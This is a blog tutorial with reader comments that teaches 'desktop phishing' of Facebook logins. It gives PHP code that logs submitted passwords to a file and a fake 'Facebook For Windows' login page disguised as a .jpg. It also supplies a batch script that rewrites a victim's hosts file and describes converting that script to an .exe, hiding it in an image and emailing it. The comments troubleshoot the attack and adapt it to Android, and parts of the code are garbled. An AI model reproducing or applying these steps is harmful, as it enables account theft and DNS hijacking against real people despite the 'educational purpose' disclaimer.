Advanced Level Facebook Desktop Phishing Method – 2015 (Undetectable)


As mentioned in my previous article, this post explores a bit of batch file programming and then applies it to Facebook hacking by desktop phishing. The advantage here is that the victim will not be able to identify the fake page, since the URL in the address bar looks the same as the genuine one. This post also includes new PHP code for making a phishing page that is undetectable and can bypass the security check of a hosting site.

This tutorial is a non-exhaustive guide for beginners. If you have not read my previous articles “DNS Hijacking” and “Hacking facebook accounts using phishing”, I would ask you to read them before continuing, since they give the prerequisite knowledge for the topics that we are going to discuss today.

Difference between phishing and desktop phishing

In phishing

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2. Victim enters his credentials in the fake login page, and they go to the attacker.

3. Victim is then redirected to an error page or the genuine website, depending on the attacker.

But the main drawback of phishing is that the victim can easily differentiate between the fake and the real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing the domain name.

In desktop phishing

1. Attacker sends an executable file to the victim, and the victim is supposed to double-click on it. Attacker’s job is done.

2. Victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, and the victim doesn’t come to know.

3. The rest is the same as in normal phishing.

What is Hosts File?

The hosts file is a text file containing domain names and the IP addresses associated with them.
Location of the hosts file in Windows: C:\Windows\System32\drivers\etc. Whenever we visit any website, say , a query is sent to the Domain Name Server (DNS) to look up the IP address associated with that website/domain. But before doing this, the hosts file on our local computer is checked for the IP address associated with the domain name.

Suppose we make an entry in hosts file as shown. When we visit , we would be taken to this No query for resolving IP address associated with would be sent to DNS.

What is the attack?

I hope you now have an idea of how modification of the hosts file on the victim’s computer can be misused.
We need to modify the victim’s hosts file by adding the genuine domain name and the IP address of our fake website/phishing page. Whenever the victim visits the genuine website, he is directed to our fake login page, and the domain name in the URL box remains genuine as typed by the victim. Hence the domain name is spoofed.

Steps to perform attack:

Step 1. Making undetectable phishing page

What you need :

for programming (Download :

Steps :

Use Notepad++ for the steps given below

1) Copy this code and paste it in a new document and save it as index.php

$id = $_GET[“id”];
if ($id == “facebookforwindows”) {
$myFile = “SoftwareDownload.jpg”;
$fh = fopen($myFile, ‘r’);
$theData = fread($fh, 500000);
echo $theData;

$myFile1 = “Follow.jpg”;
$fh1 = fopen($myFile1, ‘r’);
$theData1 = fread($fh1, 500000);
echo $theData1;

Note : Change “($id == “facebookforwindows”)” with “($id == “YOUR_PASSWORD”)“

(You can put any password as YOUR_PASSWORD)

2) Copy below code and paste it in a new document and save it as Follow.jpg (Code Not By ME)

<!DOCTYPE html>
  <title>Find your Facebook ID – a 5-second easy tool for locating your Facebook numeric personal ID</title>
  <meta name=”description” content=”If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool.” />
  <link rel=”stylesheet” href=”reset.css” type=”text/css” media=”screen”>
  <link rel=”stylesheet” href=”style.css” type=”text/css” media=”screen”>

 <script src=””></script>  <script src=”script.js” type=”text/javascript” charset=”utf-8″></script>
  <meta property=”fb:admins” content=”1146295886″ />
  <form action=”” method=”post”>

 <label for=”fb_profile_url” class=”text-input-label fb_profile_url-text-input-label”>
  Enter your personal Facebook profile URL:

 <input type=”text” name=”fb_profile_url” value=”” class=”nr-text” size=”45″ placeholder=”” />
 <input type=”hidden” name=”unsanitized” class=”nr-hidden hidden-input-for-unsanitized” />
  <input type=”submit” value=”Lookup numeric ID…” class=”button-primary”>

 <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1>

 <p id=”description”>
  For integrations of certain Facebook social plugins, like the “Like” button and “Like box”, and others, Facebook
  requires that you know your Facebook numeric user ID.  Unfortunately, they make this very difficult to find, especially
  if you have a so-called “vanity” personalized profile URL. If you can’t find your Facebook ID, or don’t know what it is
  and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
  personal profile page.


<script type=”text/javascript”>
  var _gaq = _gaq || [];
  _gaq.push([‘_setAccount’, ‘UA-3361652-13’]);
  (function() {
    var ga = document.createElement(‘script’); ga.type = ‘text/javascript’; ga.async = true;
    ga.src = (‘https:’ == document.location.protocol ? ‘https://ssl’ : ‘http://www’) + ‘’;
    var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ga, s);

3) Copy this code and paste it in a new document and save it as data.php

header (‘Location:’);
$handle = fopen(“PassFace.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
fwrite($handle, “rn”);

4) Copy this code and paste it in a new document and save it as SoftwareDownload.jpg

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “”>
<meta http-equiv=”Content-Type” content=”text/html; charset=ISO-8859-1″>
<title>Facebook For Windows : Welcome</title>
<style type=”text/css”>
html, body
   height: 100%;
   width: 1px;
   height: 50%;
   margin-bottom: -360px;
   width: 1250px;
   height: 720px;
   margin: 0 auto;
   position: relative;
   clear: left;
<style type=”text/css”>
   margin: 0;
   padding: 0;
   background-color: #6579A8;
   color: #000000;
<style type=”text/css”>
   font-family: Arial;
   font-size: 24px;
   font-weight: normal;
   font-style: normal;
   text-decoration: none;
   color: #000000;
   margin: 0 0 0 0;
   padding: 0 0 0 0;
   display: inline;
   color: #90F518;
<!–[if lt IE 7]>
<style type=”text/css”>
   img { behavior: url(“”); }
<div id=”space”><br></div>
<div id=”container”>
<div id=”bv_Image1″ style=”margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;”>
<img src=”images/Facebook_Box.png” id=”Image1″ alt=”” align=”top” border=”0″ style=”width:1093px;height:609px;”></div>
<div id=”bv_Image2″ style=”margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;”>
<img src=”images/Facebook.png” id=”Image2″ alt=”” align=”top” border=”0″ style=”width:168px;height:168px;”></div>
<div id=”bv_Text1″ style=”margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;”>
<h3>Download Facebook For Windows :<br>
</h3><font style=”font-size:13px” color=”#000000″ face=”Arial”>size : 6 MB.<br>
Platform : Windows 8.1<br>
Security Status : Active</font><h3><br>
<div id=”Html1″ style=”position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3″>
<b>Login to Donwload this Application :</b><br/>
<form name=”input” action=”data.php” method=”post”>
Username : <input type=”text” name=”username” />
Password : <input type=”password” name=”password”>
<input type=”submit” value=”Download” action=”data.php” method=”post”/>

5) Keep all above files in a single folder and name it as “xyz” (Anything you want)

6) Now create a folder inside that folder (“xyz“) and name it as “images” (Put exact name)

7) Download these images and put them inside “images”

Image 1 : or Click here
Image 2 : or Click here

Now if you followed all the steps carefully, It will look similar to this :

You have successfully created the phishing page, and we need these files in the next steps.

Step 2. Setting up Xampp web server

You can use WAMP or XAMPP; I would recommend XAMPP. This software will help you host the phishing page on your local machine.

Web server can refer to either the hardware (the computer) or the software (the computer application) that helps to deliver Web content that can be accessed through the Internet.

1) First download and install XAMPP on your PC, then start the Apache and MySQL services

2) Copy the 5 files (including the folder named ‘images‘) we created in step 1, and paste them all into the htdocs folder, which should be under XAMPP (the place where you installed XAMPP)
(normally the htdocs folder should be at the path: C:\xampp\htdocs)

Step 3. Setting up static vpn

I will use proXPN VPN for this tutorial, but I recommend you use Strong Open VPN as it is very stable; you can download it from here.

Install ProXPN VPN or any other static VPN. I recommend you use Strong VPN as it is very stable and gives you a static IP. Once you install and run it, you will get a static IP (VPN).

Now you have a static ip for your Localhost.

Step 4. Creating a batch(.bat) file to accomplish replacing victims hosts file

Now we have to replace some text in the victim's hosts file, which is at C:\Windows\System32\drivers\etc. You can do this in many ways, either by using an SFX archive or by using a batch file; for this tutorial we will use a batch file to accomplish the job.

Here is the batch program that I was talking about in my last post ‘DNS hijacking‘. As we have seen that, adding an IP address with a corresponding domain name in the host file would redirect you to webpage as you desire with a desired domain name.

So, we are going to take this into next level for hacking purposes. We’ll change the host file in the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.

Here is the batch program that can be used to manipulate the HOSTS file.

@echo off
set hostspath=%windir%System32driversetchosts

echo >> %hostspath%
echo >> %hostspath%
echo >> %hostspath%
echo >> %hostspath%


Replace the ip address( with the static IP address of your vpn (The static ip vpn address you got in step 3), and save it as ‘anyname.bat‘.

Let us now discuss what exactly the above code does. The second line of the code above takes the admin privileges over the ‘hosts’ file, so that editing can be done. Then we move into the path where the ‘hosts’ file is located and then we write 4 lines into the file. Those lines of codes are responsible for the redirection of the user. Therefore, we try to redirect all the possible combinations of facebook addresses to the IP that is provided.

Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.

Step 5. Sending the file to victim

You can also change the .bat file into .exe file using batch to exe converter. Click the link to learn how to convert a batch file into an executable.

After it is successfully converted to an anyname.exe file, you can do one more step to hide this .exe file in an image file; follow my previous guide: How To Make A Virus And Hide In An Image File (FUD)

Now send the file via email or upload the file to a site and ask the victim to download the file , After the victim downloads and clicks the file, his host file will be replaced ,So now when ever the victim enters He will be redirected to our Phisher Page, But the URL will remain as

To see all the victim's credentials and password, open the newly created log.txt file, which is under the htdocs folder

You are done.

Note: Use this article for educational purpose only



32 thoughts on “Advanced Level Facebook Desktop Phishing Method – 2015 (Undetectable)

    1. Mr Josh Das, Thank you for your valuable feedback.

      You are right, the batch file is not working and it was my mistake…sorry, but i have the working batch program here :

      @echo off
      set hostspath=%windir%System32driversetchosts

      echo >> %hostspath%
      echo >> %hostspath%
      echo >> %hostspath%
      echo >> %hostspath%


      Replace the ip address with your static ip

    2. Thanks, it updated the hosts file; however, I am now hitting an error. My XAMPP is on, but when I use the browser to go to Facebook, it won't go to my static IP; it goes to the original Facebook page! And when I hit the IP in the address bar, there is also an error in the index file, line 2! Please fix, let me know brother! m/

    1. If you want to use this phishing method with Android users then you have to use Android hosts tweaks instead of creating a batch (.bat) file to accomplish replacing the victim's hosts file, and you can also use the Bit Web Server app instead of the XAMPP web server

  1. I'm getting "Notice: Undefined index: id in C:xampphtdocsindex.php on line 2".

    What am I missing in that line of the index.php file? Thanks.

    1. @Irshad Pathoor
      Notice: Undefined index: id in C:xampphtdocsindex.php on line

      have already done that, turned on these two services, what i'm missing sir, idk. please help

  2. I did exactly like you, but after altering the hosts file on my Windows 8 system, my browser stopped opening the Facebook page, showing an "unable to connect to internet" error on the browser page. After running the Apache and MySQL servers from XAMPP, the problem still persists. What am I doing wrong?

    I didn't install vpn software because I already have a static IP.

  3. @Irshad Pathoor
    Sir, can we use an ID from the "no-ip" software, as it gives us a static IP type of thing? If not, is there any free VPN that gives us a static IP?

  4. I was just looking for this info for a while. After 6 hours of continuous Googling, finally I got it on your web site. I wonder what's lacking in Google's strategy that it does not rank this type of informative website at the top of the list. Generally the top web sites are full of garbage.
